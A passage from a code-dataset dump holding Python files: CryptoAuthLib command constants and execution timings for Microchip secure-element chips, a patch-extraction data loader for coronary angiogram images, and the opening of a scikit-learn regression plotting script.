Nonce mode: input size mask\r\nNONCE_MODE_INPUT_LEN_MASK = const(0x20)\r\n# Nonce mode: input size is 32 bytes\r\nNONCE_MODE_INPUT_LEN_32 = const(0x00)\r\n# Nonce mode: input size is 64 bytes\r\nNONCE_MODE_INPUT_LEN_64 = const(0x20)\r\n\r\n# Nonce mode: target mask\r\nNONCE_MODE_TARGET_MASK = const(0xC0)\r\n# Nonce mode: target is TempKey\r\nNONCE_MODE_TARGET_TEMPKEY = const(0x00)\r\n# Nonce mode: target is Message Digest Buffer\r\nNONCE_MODE_TARGET_MSGDIGBUF = const(0x40)\r\n# Nonce mode: target is Alternate Key Buffer\r\nNONCE_MODE_TARGET_ALTKEYBUF = const(0x80)\r\n\r\n# Nonce zero (param2): calculation mode mask\r\nNONCE_ZERO_CALC_MASK = const(0x8000)\r\n# Nonce zero (param2): calculation mode random, use RNG in calculation and return RNG output\r\nNONCE_ZERO_CALC_RANDOM = const(0x0000)\r\n# Nonce zero (param2): calculation mode TempKey, use TempKey in calculation and return new TempKey value\r\nNONCE_ZERO_CALC_TEMPKEY = const(0x8000)\r\n\r\n# Nonce NumIn size for random modes\r\nNONCE_NUMIN_SIZE = const(20)\r\n# Nonce NumIn size for 32-byte pass-through mode\r\nNONCE_NUMIN_SIZE_PASSTHROUGH = const(32)\r\n\r\n# Nonce command response packet size with no output\r\nNONCE_RSP_SIZE_SHORT = const(ATCA_RSP_SIZE_MIN)\r\n# Nonce command response packet size with output\r\nNONCE_RSP_SIZE_LONG = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Pause Command \"\"\"\r\n# Pause command index for Selector\r\nPAUSE_SELECT_IDX = const(ATCA_PARAM1_IDX)\r\n# Pause command index for 2. parameter\r\nPAUSE_PARAM2_IDX = const(ATCA_PARAM2_IDX)\r\n# Pause command packet size\r\nPAUSE_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Pause command response packet size\r\nPAUSE_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the PrivWrite Command \"\"\"\r\n# PrivWrite command index for zone\r\nPRIVWRITE_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# PrivWrite command index for KeyID\r\nPRIVWRITE_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# PrivWrite command index for value\r\nPRIVWRITE_VALUE_IDX = const(5)\r\n# PrivWrite command index for MAC\r\nPRIVWRITE_MAC_IDX = const(41)\r\n# PrivWrite command packet size\r\nPRIVWRITE_COUNT = const(75)\r\n# PrivWrite zone bits 0 to 5 and 7 are 0.\r\nPRIVWRITE_ZONE_MASK = const(0x40)\r\n# PrivWrite mode: encrypted\r\nPRIVWRITE_MODE_ENCRYPT = const(0x40)\r\n# PrivWrite command response packet size\r\nPRIVWRITE_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the Random Command \"\"\"\r\n# Random command index for mode\r\nRANDOM_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Random command index for 2. 
parameter\r\nRANDOM_PARAM2_IDX = const(ATCA_PARAM2_IDX)\r\n# Random command packet size\r\nRANDOM_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Random mode for automatic seed update\r\nRANDOM_SEED_UPDATE = const(0x00)\r\n# Random mode for no seed update\r\nRANDOM_NO_SEED_UPDATE = const(0x01)\r\n# Number of bytes in the data packet of a random command\r\nRANDOM_NUM_SIZE = const(32)\r\n# Random command response packet size\r\nRANDOM_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Read Command \"\"\"\r\n# Read command index for zone\r\nREAD_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# Read command index for address\r\nREAD_ADDR_IDX = const(ATCA_PARAM2_IDX)\r\n# Read command packet size\r\nREAD_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Read zone bits 2 to 6 are 0.\r\nREAD_ZONE_MASK = const(0x83)\r\n# Read command response packet size when reading 4 bytes\r\nREAD_4_RSP_SIZE = const(ATCA_RSP_SIZE_VAL)\r\n# Read command response packet size when reading 32 bytes\r\nREAD_32_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the SecureBoot Command \"\"\"\r\n# SecureBoot command index for mode\r\nSECUREBOOT_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# SecureBoot digest input size\r\nSECUREBOOT_DIGEST_SIZE = const(32)\r\n# SecureBoot signature input size\r\nSECUREBOOT_SIGNATURE_SIZE = const(64)\r\n# SecureBoot command packet size for just a digest\r\nSECUREBOOT_COUNT_DIG = const(ATCA_CMD_SIZE_MIN + SECUREBOOT_DIGEST_SIZE)\r\n# SecureBoot command packet size for a digest and signature\r\nSECUREBOOT_COUNT_DIG_SIG = const(\r\n ATCA_CMD_SIZE_MIN + SECUREBOOT_DIGEST_SIZE + SECUREBOOT_SIGNATURE_SIZE)\r\n# SecureBoot MAC output size\r\nSECUREBOOT_MAC_SIZE = const(32)\r\n# SecureBoot response packet size for no MAC\r\nSECUREBOOT_RSP_SIZE_NO_MAC = const(ATCA_RSP_SIZE_MIN)\r\n# SecureBoot response packet size with MAC\r\nSECUREBOOT_RSP_SIZE_MAC = const(ATCA_PACKET_OVERHEAD + SECUREBOOT_MAC_SIZE)\r\n\r\n# SecureBoot mode mask\r\nSECUREBOOT_MODE_MASK = const(0x07)\r\n# SecureBoot mode Full\r\nSECUREBOOT_MODE_FULL = const(0x05)\r\n# SecureBoot mode FullStore\r\nSECUREBOOT_MODE_FULL_STORE = const(0x06)\r\n# SecureBoot mode FullCopy\r\nSECUREBOOT_MODE_FULL_COPY = const(0x07)\r\n# SecureBoot mode flag to prohibit SecureBoot until next power cycle\r\nSECUREBOOT_MODE_PROHIBIT_FLAG = const(0x40)\r\n# SecureBoot mode flag for encrypted digest and returning validating MAC\r\nSECUREBOOT_MODE_ENC_MAC_FLAG = const(0x80)\r\n\r\n# SecureBootConfig byte offset into the configuration zone\r\nSECUREBOOTCONFIG_OFFSET = const(70)\r\n# Mask for SecureBootMode field in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_MASK = const(0x0003)\r\n# Disabled SecureBootMode in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_DISABLED = const(0x0000)\r\n# Both digest and signature always required SecureBootMode in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_FULL_BOTH = const(0x0001)\r\n# Signature stored SecureBootMode in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_FULL_SIG = const(0x0002)\r\n# Digest stored SecureBootMode in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_FULL_DIG = const(0x0003)\r\n\r\n\r\n\"\"\" name Definitions for the SelfTest Command \"\"\"\r\n# SelfTest command index for mode\r\nSELFTEST_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# SelfTest command packet size\r\nSELFTEST_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# SelfTest mode RNG DRBG function\r\nSELFTEST_MODE_RNG = const(0x01)\r\n# SelfTest mode ECDSA verify function\r\nSELFTEST_MODE_ECDSA_SIGN_VERIFY = const(0x02)\r\n# SelfTest mode ECDH 
function\r\nSELFTEST_MODE_ECDH = const(0x08)\r\n# SelfTest mode AES encrypt function\r\nSELFTEST_MODE_AES = const(0x10)\r\n# SelfTest mode SHA function\r\nSELFTEST_MODE_SHA = const(0x20)\r\n# SelfTest mode all algorithms\r\nSELFTEST_MODE_ALL = const(0x3B)\r\n# SelfTest command response packet size\r\nSELFTEST_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the SHA Command \"\"\"\r\nSHA_COUNT_SHORT = const(ATCA_CMD_SIZE_MIN)\r\n# Just a starting size\r\nSHA_COUNT_LONG = const(ATCA_CMD_SIZE_MIN)\r\nATCA_SHA_DIGEST_SIZE = const(32)\r\nSHA_DATA_MAX = const(64)\r\nATCA_SHA256_BLOCK_SIZE = const(64)\r\nSHA_CONTEXT_MAX_SIZE = const(99)\r\n\r\n# Mask bits 0-2\r\nSHA_MODE_MASK = const(0x07)\r\n# Initialization, does not accept a message\r\nSHA_MODE_SHA256_START = const(0x00)\r\n# Add 64 bytes in the message to the SHA context\r\nSHA_MODE_SHA256_UPDATE = const(0x01)\r\n# Complete the calculation and return the digest\r\nSHA_MODE_SHA256_END = const(0x02)\r\n# Add the 64-byte ECC public key in the slot to the SHA context\r\nSHA_MODE_SHA256_PUBLIC = const(0x03)\r\n# Initialization, HMAC calculation\r\nSHA_MODE_HMAC_START = const(0x04)\r\n# Add 64 bytes in the message to the SHA context\r\nSHA_MODE_HMAC_UPDATE = const(0x01)\r\n# Complete the HMAC computation and return digest\r\nSHA_MODE_HMAC_END = const(0x05)\r\n# Complete the HMAC computation and return digest... Different command on 608\r\nSHA_MODE_608_HMAC_END = const(0x02)\r\n# Read current SHA-256 context out of the device\r\nSHA_MODE_READ_CONTEXT = const(0x06)\r\n# Restore a SHA-256 context into the device\r\nSHA_MODE_WRITE_CONTEXT = const(0x07)\r\n# Resulting digest target location mask\r\nSHA_MODE_TARGET_MASK = const(0xC0)\r\n# Place resulting digest both in Output buffer and TempKey\r\nSHA_MODE_TARGET_TEMPKEY = const(0x00)\r\n# Place resulting digest both in Output buffer and Message Digest Buffer\r\nSHA_MODE_TARGET_MSGDIGBUF = const(0x40)\r\n# Place resulting digest in the Output buffer ONLY\r\nSHA_MODE_TARGET_OUT_ONLY = const(0xC0)\r\n\r\n# SHA command response packet size\r\nSHA_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n# SHA command response packet size with status code only\r\nSHA_RSP_SIZE_SHORT = const(ATCA_RSP_SIZE_MIN)\r\n# SHA command response packet size\r\nSHA_RSP_SIZE_LONG = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Sign Command \"\"\"\r\n# Sign command index for mode\r\nSIGN_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Sign command index for key id\r\nSIGN_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# Sign command packet size\r\nSIGN_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Sign mode bits 1 to 4 are 0\r\nSIGN_MODE_MASK = const(0xE1)\r\n# Sign mode\t 0: internal\r\nSIGN_MODE_INTERNAL = const(0x00)\r\n# Sign mode bit 1: Signature will be used for Verify(Invalidate)\r\nSIGN_MODE_INVALIDATE = const(0x01)\r\n# Sign mode bit 6: include serial number\r\nSIGN_MODE_INCLUDE_SN = const(0x40)\r\n# Sign mode bit 7: external\r\nSIGN_MODE_EXTERNAL = const(0x80)\r\n# Sign mode message source mask\r\nSIGN_MODE_SOURCE_MASK = const(0x20)\r\n# Sign mode message source is TempKey\r\nSIGN_MODE_SOURCE_TEMPKEY = const(0x00)\r\n# Sign mode message source is the Message Digest Buffer\r\nSIGN_MODE_SOURCE_MSGDIGBUF = const(0x20)\r\n# Sign command response packet size\r\nSIGN_RSP_SIZE = const(ATCA_RSP_SIZE_MAX)\r\n\r\n\"\"\" name Definitions for the UpdateExtra Command \"\"\"\r\n# UpdateExtra command index for mode\r\nUPDATE_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# UpdateExtra command index for new value\r\nUPDATE_VALUE_IDX = 
const(ATCA_PARAM2_IDX)\r\n# UpdateExtra command packet size\r\nUPDATE_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# UpdateExtra mode update UserExtra (config byte 84)\r\nUPDATE_MODE_USER_EXTRA = const(0x00)\r\n# UpdateExtra mode update Selector (config byte 85)\r\nUPDATE_MODE_SELECTOR = const(0x01)\r\n# UpdateExtra mode update UserExtraAdd (config byte 85)\r\nUPDATE_MODE_USER_EXTRA_ADD = const(UPDATE_MODE_SELECTOR)\r\n# UpdateExtra mode: decrement counter\r\nUPDATE_MODE_DEC_COUNTER = const(0x02)\r\n# UpdateExtra command response packet size\r\nUPDATE_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the Verify Command \"\"\"\r\n# Verify command index for mode\r\nVERIFY_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Verify command index for key id\r\nVERIFY_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# Verify command index for data\r\nVERIFY_DATA_IDX = const(5)\r\n# Verify command packet size for 256-bit key in stored mode\r\nVERIFY_256_STORED_COUNT = const(71)\r\n# Verify command packet size for 283-bit key in stored mode\r\nVERIFY_283_STORED_COUNT = const(79)\r\n# Verify command packet size for 256-bit key in validate mode\r\nVERIFY_256_VALIDATE_COUNT = const(90)\r\n# Verify command packet size for 283-bit key in validate mode\r\nVERIFY_283_VALIDATE_COUNT = const(98)\r\n# Verify command packet size for 256-bit key in external mode\r\nVERIFY_256_EXTERNAL_COUNT = const(135)\r\n# Verify command packet size for 283-bit key in external mode\r\nVERIFY_283_EXTERNAL_COUNT = const(151)\r\n# Verify key size for 256-bit key\r\nVERIFY_256_KEY_SIZE = const(64)\r\n# Verify key size for 283-bit key\r\nVERIFY_283_KEY_SIZE = const(72)\r\n# Verify signature size for 256-bit key\r\nVERIFY_256_SIGNATURE_SIZE = const(64)\r\n# Verify signature size for 283-bit key\r\nVERIFY_283_SIGNATURE_SIZE = const(72)\r\n# Verify size of \"other data\"\r\nVERIFY_OTHER_DATA_SIZE = const(19)\r\n# Verify mode bits 2 to 7 are 0\r\nVERIFY_MODE_MASK = const(0x03)\r\n# Verify mode: stored\r\nVERIFY_MODE_STORED = const(0x00)\r\n# Verify mode: validate external\r\nVERIFY_MODE_VALIDATE_EXTERNAL = const(0x01)\r\n# Verify mode: external\r\nVERIFY_MODE_EXTERNAL = const(0x02)\r\n# Verify mode: validate\r\nVERIFY_MODE_VALIDATE = const(0x03)\r\n# Verify mode: invalidate\r\nVERIFY_MODE_INVALIDATE = const(0x07)\r\n# Verify mode message source mask\r\nVERIFY_MODE_SOURCE_MASK = const(0x20)\r\n# Verify mode message source is TempKey\r\nVERIFY_MODE_SOURCE_TEMPKEY = const(0x00)\r\n# Verify mode message source is the Message Digest Buffer\r\nVERIFY_MODE_SOURCE_MSGDIGBUF = const(0x20)\r\n# Verify mode: MAC\r\nVERIFY_MODE_MAC_FLAG = const(0x80)\r\n# Verify key type: B283\r\nVERIFY_KEY_B283 = const(0)\r\n# Verify key type: K283\r\nVERIFY_KEY_K283 = const(0x0001)\r\n# Verify key type: P256\r\nVERIFY_KEY_P256 = const(0x0004)\r\n# Verify command response packet size\r\nVERIFY_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n# Verify command response packet size with validating MAC\r\nVERIFY_RSP_SIZE_MAC = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Write Command \"\"\"\r\n# Write command index for zone\r\nWRITE_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# Write command index for address\r\nWRITE_ADDR_IDX = const(ATCA_PARAM2_IDX)\r\n# Write command index for data\r\nWRITE_VALUE_IDX = const(ATCA_DATA_IDX)\r\n# Write command index for MAC following short data\r\nWRITE_MAC_VS_IDX = const(9)\r\n# Write command index for MAC following long data\r\nWRITE_MAC_VL_IDX = const(37)\r\n# Write MAC size\r\nWRITE_MAC_SIZE = const(32)\r\n# Write zone bits 2 
to 5 are 0.\r\nWRITE_ZONE_MASK = const(0xC3)\r\n# Write zone bit 6: write encrypted with MAC\r\nWRITE_ZONE_WITH_MAC = const(0x40)\r\n# Write zone id OTP\r\nWRITE_ZONE_OTP = const(1)\r\n# Write zone id data\r\nWRITE_ZONE_DATA = const(2)\r\n# Write command response packet size\r\nWRITE_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" Execution times (ms) for ATSHA204A supported commands \"\"\"\r\nATSHA204A_EXECUTION_TIME = {\r\n ATCA_CHECKMAC: 38,\r\n ATCA_DERIVE_KEY: 62,\r\n ATCA_GENDIG: 43,\r\n ATCA_HMAC: 69,\r\n ATCA_INFO: 2,\r\n ATCA_LOCK: 24,\r\n ATCA_MAC: 35,\r\n ATCA_NONCE: 60,\r\n ATCA_PAUSE: 2,\r\n ATCA_RANDOM: 50,\r\n ATCA_READ: 5,\r\n ATCA_SHA: 22,\r\n ATCA_UPDATE_EXTRA: 12,\r\n ATCA_WRITE: 42\r\n}\r\n\r\n\"\"\" Execution times (ms) for ATECC108A supported commands \"\"\"\r\nATECC108A_EXECUTION_TIME = {\r\n ATCA_CHECKMAC: 13,\r\n ATCA_COUNTER: 20,\r\n ATCA_DERIVE_KEY: 50,\r\n ATCA_GENDIG: 11,\r\n ATCA_GENKEY: 115,\r\n ATCA_HMAC: 23,\r\n ATCA_INFO: 2,\r\n ATCA_LOCK: 32,\r\n ATCA_MAC: 14,\r\n ATCA_NONCE: 29,\r\n ATCA_PAUSE: 3,\r\n ATCA_PRIVWRITE: 48,\r\n ATCA_RANDOM: 23,\r\n ATCA_READ: 5,\r\n ATCA_SHA: 9,\r\n ATCA_SIGN: 60,\r\n ATCA_UPDATE_EXTRA: 10,\r\n ATCA_VERIFY: 72,\r\n ATCA_WRITE: 26\r\n}\r\n\r\n\"\"\" Execution times (ms) for ATECC508A supported commands \"\"\"\r\nATECC508A_EXECUTION_TIME = {\r\n ATCA_CHECKMAC: 13,\r\n ATCA_COUNTER: 20,\r\n ATCA_DERIVE_KEY: 50,\r\n ATCA_ECDH: 58,\r\n ATCA_GENDIG: 11,\r\n ATCA_GENKEY: 115,\r\n ATCA_HMAC: 23,\r\n ATCA_INFO: 2,\r\n ATCA_LOCK: 32,\r\n ATCA_MAC: 14,\r\n ATCA_NONCE: 29,\r\n ATCA_PAUSE: 3,\r\n ATCA_PRIVWRITE: 48,\r\n ATCA_RANDOM: 23,\r\n ATCA_READ: 5,\r\n ATCA_SHA: 9,\r\n ATCA_SIGN: 60,\r\n ATCA_UPDATE_EXTRA: 10,\r\n ATCA_VERIFY: 72,\r\n ATCA_WRITE: 26\r\n}\r\n\r\n\"\"\" Execution times (ms) for ATECC608A supported commands \"\"\"\r\nATECC608A_EXECUTION_TIME = {\r\n ATCA_AES: 27,\r\n ATCA_CHECKMAC: 40,\r\n ATCA_COUNTER: 25,\r\n ATCA_DERIVE_KEY: 50,\r\n ATCA_ECDH: 60,\r\n ATCA_GENDIG: 25,\r\n ATCA_GENKEY: 115,\r\n ATCA_INFO: 5,\r\n ATCA_KDF: 165,\r\n ATCA_LOCK: 35,\r\n ATCA_MAC: 55,\r\n ATCA_NONCE: 20,\r\n ATCA_PRIVWRITE: 50,\r\n ATCA_RANDOM: 23,\r\n ATCA_READ: 5,\r\n ATCA_SECUREBOOT: 80,\r\n ATCA_SELFTEST: 250,\r\n ATCA_SHA: 36,\r\n ATCA_SIGN: 115,\r\n ATCA_UPDATE_EXTRA: 10,\r\n ATCA_VERIFY: 105,\r\n ATCA_WRITE: 45\r\n}\r\n\r\nEXECUTION_TIME = {\r\n \"ATSHA204A\": ATSHA204A_EXECUTION_TIME,\r\n \"ATECC108A\": ATECC108A_EXECUTION_TIME,\r\n \"ATECC508A\": ATECC508A_EXECUTION_TIME,\r\n \"ATECC608A\": ATECC608A_EXECUTION_TIME\r\n}\r\n","sub_path":"cryptoauthlib/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":37921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29358212","text":"import numpy as np\nimport cv2\nimport time\nimport matplotlib.pyplot as plt\nfrom patchextraction import *\nfrom time import perf_counter\n\n\n\ndef viewPatchNeighbor(img, patch_index, patch_size, stride, neightbor_offset):\n try:\n height, width, n_scales = img.shape\n img_temp = img\n\n except ValueError:\n height, width = img.shape\n n_scales = 1\n img_temp = img[:,:,np.newaxis]\n \n n_patches_in_height = int(np.floor((height - patch_size + stride) / stride))\n n_patches_in_width = int(np.floor((width - patch_size + stride) / stride))\n\n patch_col = patch_index % n_patches_in_width\n patch_row = int(patch_index / n_patches_in_width)\n\n # Neighborhood of the selected patch:\n active_row_indices = np.arange(-int(np.floor(patch_size/2)) - neightbor_offset, 
int(np.ceil(patch_size/2)) + neightbor_offset) + patch_row\n active_col_indices = np.arange(-int(np.floor(patch_size/2)) - neightbor_offset, int(np.ceil(patch_size/2)) + neightbor_offset) + patch_col\n neighborhood_active_row_indices = np.arange(-int(np.floor(patch_size/2)) - neightbor_offset, int(np.ceil(patch_size/2)) + neightbor_offset)\n neighborhood_active_col_indices = np.arange(-int(np.floor(patch_size/2)) - neightbor_offset, int(np.ceil(patch_size/2)) + neightbor_offset)\n \n offset = int(np.floor(patch_size/2)) + neightbor_offset\n\n neighborhood_active_row_indices = neighborhood_active_row_indices[np.where(active_row_indices >= 0)[0]]\n active_row_indices = active_row_indices[np.where(active_row_indices >= 0)[0]]\n \n neighborhood_active_row_indices = neighborhood_active_row_indices[np.where(active_row_indices < height)[0]]\n active_row_indices = active_row_indices[np.where(active_row_indices < height)[0]]\n \n neighborhood_active_col_indices = neighborhood_active_col_indices[np.where(active_col_indices >= 0)[0]]\n active_col_indices = active_col_indices[np.where(active_col_indices >= 0)[0]]\n \n neighborhood_active_col_indices = neighborhood_active_col_indices[np.where(active_col_indices < width)[0]]\n active_col_indices = active_col_indices[np.where(active_col_indices < width)[0]]\n\n active_col_indices, active_row_indices = np.meshgrid(active_col_indices, active_row_indices)\n active_col_indices = active_col_indices.reshape(active_col_indices.size)\n active_row_indices = active_row_indices.reshape(active_row_indices.size)\n \n neighborhood_active_col_indices, neighborhood_active_row_indices = np.meshgrid(neighborhood_active_col_indices, neighborhood_active_row_indices)\n neighborhood_active_col_indices = neighborhood_active_col_indices.reshape(neighborhood_active_col_indices.size) + offset\n neighborhood_active_row_indices = neighborhood_active_row_indices.reshape(neighborhood_active_row_indices.size) + offset\n\n patch_neighborhood = np.zeros([patch_size + neightbor_offset*2, patch_size + neightbor_offset*2, n_scales]) \n patch_neighborhood[neighborhood_active_row_indices, neighborhood_active_col_indices, :] = img_temp[active_col_indices, active_row_indices, :]\n\n return patch_neighborhood\n\n\n\ndef load_image(filename):\n img = cv2.imread(filename)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n return img\n\n\n\ndef extract_patches(img, patch_size, stride, sample_percentaje, randomize_sample = True, sample_indices = [], normalize_data = False, class_extraction_type = 'max'):\n try:\n n_scales, height, width = img.shape\n img_temp = img.copy()\n\n except ValueError:\n height, width = img.shape\n n_scales = 1\n img_temp = img[np.newaxis, :, :]\n \n n_patches_in_height = int(np.floor((height - patch_size + stride) / stride))\n n_patches_in_width = int(np.floor((width - patch_size + stride) / stride))\n\n if (sample_percentaje > 1):\n sample_size = sample_percentaje\n\n else:\n sample_size = np.max([int(np.floor(sample_percentaje * n_patches_in_height * n_patches_in_width)), 1])\n \n if len(sample_indices) == 0:\n sample_indices = np.arange(n_patches_in_height * n_patches_in_width)\n\n if (randomize_sample):\n np.random.shuffle(sample_indices)\n \n if normalize_data:\n observations_data = extractnormalizedpatches(img_temp, patch_size, stride, sample_indices[0:sample_size])\n observations_classes = []\n\n else:\n if class_extraction_type == 'max':\n observations_data, observations_classes = extractpatchesMax(img_temp, patch_size, stride, sample_indices[0:sample_size])\n 
else:\n observations_data, observations_classes = extractpatchesCenter(img_temp, patch_size, stride, sample_indices[0:sample_size])\n \n return observations_data, sample_indices[0:sample_size], observations_classes\n\n\n\ndef extract_balanced_patches(img, positive_class_percentaje, patch_size, stride, sample_percentaje, randomize_sample = True, sample_indices = [], class_extraction_type = 'max'):\n try:\n n_scales, height, width = img.shape\n img_temp = img.copy()\n\n except ValueError:\n height, width = img.shape\n n_scales = 1\n img_temp = img[np.newaxis, :, :]\n \n n_patches_in_height = int(np.floor((height - patch_size + stride) / stride))\n n_patches_in_width = int(np.floor((width - patch_size + stride) / stride))\n\n if (sample_percentaje > 1):\n sample_size = sample_percentaje\n\n else:\n sample_size = np.max([int(np.floor(sample_percentaje * n_patches_in_height * n_patches_in_width)), 1])\n \n if len(sample_indices) == 0:\n sample_indices = np.arange(n_patches_in_height * n_patches_in_width)\n\n if (randomize_sample):\n np.random.shuffle(sample_indices)\n\n if class_extraction_type == 'center':\n balanced_sample, balanced_sample_indices, balanced_classes = extractbalancedpatchesCenter(img_temp, patch_size, stride, positive_class_percentaje, sample_indices[0:sample_size])\n\n else:\n balanced_sample, balanced_sample_indices, balanced_classes = extractbalancedpatchesMax(img_temp, patch_size, stride, positive_class_percentaje, sample_indices[0:sample_size])\n \n\n return balanced_sample, balanced_sample_indices, balanced_classes\n\n\ndef get_dataset(directory, initial_index, final_index, patch_size = 0, stride = 0, sample_percentaje = 0.01, class_extraction_type = 'max', randomize_sample = True, balance_dataset = -1.0, normalize_dataset = False, show_time = False):\n starting_time = perf_counter()\n\n img = load_image(directory + str(initial_index) + '.png') / 255;\n img_gt = load_image(directory + str(initial_index) + '_gt.png') / 127.5 - 1.0\n\n height, width = img.shape\n n_images_in_dataset = final_index - initial_index + 1\n \n img_cat = np.zeros([height, width * n_images_in_dataset])\n img_gt_cat = np.zeros([height, width * n_images_in_dataset])\n \n img_cat[:, 0:width] = img\n img_gt_cat[:, 0:width] = img_gt\n\n for current_image_index in range(1, n_images_in_dataset):\n filename = directory + str(current_image_index + initial_index) + '.png'\n #print('Loading image: \"{}\"'.format(filename))\n filtered_img = load_image(filename) / 255.0\n filename = directory + str(current_image_index + initial_index) + '_gt.png'\n img_gt = load_image(filename)/127.5 - 1.0\n\n img_cat[:, (current_image_index * width):((current_image_index + 1) * width)] = filtered_img\n img_gt_cat[:, (current_image_index * width):((current_image_index + 1) * width)] = img_gt\n\n if balance_dataset > 0.0:\n dataset_gt, sampled_indices, dataset_classes = extract_balanced_patches(img_gt_cat, balance_dataset, patch_size, stride, sample_percentaje, randomize_sample, [], class_extraction_type)\n\n else:\n dataset_gt, sampled_indices, dataset_classes = extract_patches(img_gt_cat, patch_size, stride, sample_percentaje, randomize_sample, [], False, class_extraction_type)\n \n dataset_observations, _, _ = extract_patches(img_cat, patch_size, stride, 1.0, False, sampled_indices, normalize_dataset)\n elapsed_time = perf_counter() - starting_time\n\n if show_time:\n print('Dataset shape = {}, extracted in {} seconds.'.format(dataset_observations.shape, elapsed_time))\n \n return 
dataset_classes.reshape([dataset_classes.size, 1]), dataset_observations, dataset_gt\n\n\n\nif (__name__ == \"__main__\"):\n print('Test data loader for coronary angiograms.')\n\n patch_size = 3\n stride = 1\n \n height = 10\n width = 10\n\n img_test = np.arange(100, dtype = np.float64).reshape([1, 10, 10])\n img_gt = img_test.copy()\n img_gt[img_gt < 50] = -1\n img_gt[img_gt >= 50] = 1 \n\n n_patches_in_height = int(np.floor((height - patch_size + stride) / stride))\n n_patches_in_width = int(np.floor((width - patch_size + stride) / stride))\n sampled_indices = np.arange(n_patches_in_height * n_patches_in_width, dtype = np.int64)\n\n balanced_sample_gt, balanced_sample_indices = extractbalancedpatches(img_gt, 3, 1, 0.3, sampled_indices)\n\n print(balanced_sample_gt.shape)\n\n plt.figure()\n for sample_idx, sample in enumerate(balanced_sample_gt):\n row_idx = int(sample_idx / 5)\n col_idx = int(sample_idx % 5)\n plt.subplot(8, 5, sample_idx+1)\n plt.imshow(sample[0])\n \n print(balanced_sample_indices)\n balanced_sample, max_values = extractpatches(img_test[np.newaxis, :, :], 3, 1, balanced_sample_indices)\n\n print(balanced_sample[0])\n\n plt.figure()\n for sample_idx, sample in enumerate(balanced_sample):\n row_idx = int(sample_idx / 5)\n col_idx = int(sample_idx % 5)\n plt.subplot(8, 5, sample_idx+1)\n plt.imshow(sample[0])\n \n plt.show()","sub_path":"support_vector_machine_python/cnn_tests/src/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"562042985","text":"from pandas import read_csv\nfrom sklearn import linear_model\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.svm import SVR\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import explained_variance_score\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.linear_model import Ridge\n\n\n\"\"\"\nPlotting a regression model fitted on a single feature.\nTraining different regression models using sklearn.\n\"\"\"\n\n\n\n\n# load the data set from CSV file\ndataset = read_csv('C://Users/Ahmed/Desktop/backup/MyProject/ML-EXP/Regresstion/dataset_1.csv', header=None)\n# replace missing data with zeros.\ndataset.fillna(0, inplace=True)\n\n\n# extracting feature ID 21, change the features you want to use to fit the model here:\n# features = dataset[[2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]]\n\nfeatures = dataset[[21]]\n\n# target value\ntargets = dataset[23]\n\n\n\n\"\"\" Plotting a single feature with the regression model\"\"\"\n# training set\ntraining_X = features.values\ntraining_Y = targets.values\n\n\n# Regression models\nclf = GradientBoostingRegressor()\nr = linear_model.LinearRegression()\nridge = Ridge(alpha=1.0)\nsvr_rbf = SVR(kernel='rbf', C=1e3, gamma=0.1, verbose=True)\n\ny_rbf = ridge.fit(training_X, training_Y).predict(training_X)\n\nlw = 2\nplt.scatter(training_X, training_Y, color='red', label='data')\nplt.plot(training_X, y_rbf, color='blue', lw=lw, label='Ridge Model')\nplt.xlabel('data')\nplt.ylabel('target')\nplt.title('Ridge Model')\nplt.legend()\nplt.show()\n\n\n\nparams = {'n_estimators': 500, 'max_depth': 4, 'min_samples_split': 2,'learning_rate': 